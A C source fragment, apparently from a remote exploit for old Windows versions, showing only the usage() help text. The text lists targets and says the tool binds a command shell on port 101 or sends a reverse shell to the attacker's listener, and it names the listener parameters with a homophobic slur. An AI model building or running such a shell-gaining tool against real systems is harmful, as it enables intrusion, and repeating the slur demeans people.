
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int printf (char*) ;

void usage(char* us)
{
printf("USAGE:\n");
printf("      [+]  . 101_bblu.exe Target VulnIP (bind mode)\n");
printf("      [+]  . 101_bblu.exe Target VulnIP VulnPORT (bind mode)\n");
printf("      [+]  . 101_bblu.exe Target VulnIP VulnPORT GayIP GayPORT (reverse mode)\n");
printf("TARGET:                               \n");
printf("      [+] 1. Win2k  SP4  Server English (*)\n");
printf("      [+] 1. Win2k  SP4  Pro    English (*)\n");
printf("      [+] 1. Win2k  SP-  -      -          \n");
printf("      [+] 2. WinXP  SP2  Pro.   English    \n");
printf("      [+] 2. WinXP  SP1a Pro.   English (*)\n");
printf("      [+] 2. WinXP  SP-  -      -          \n");
printf("      [+] 3. Win2k3 SP0  Server Italian (*)\n");
printf("      [+] 3. Win2k3 SP-  -      -          \n");
printf("NOTE:                                      \n");
printf("      The exploit bind a cmdshell port 101 or\n");
printf("      reverse a cmdshell on your listener.\n");
printf("      A wildcard (*) mean tested working, else, supposed working.\n");
printf("      A symbol   (-) mean all.\n");
printf("      Compilation msvc6, cygwin, Linux.\n");
return;
}
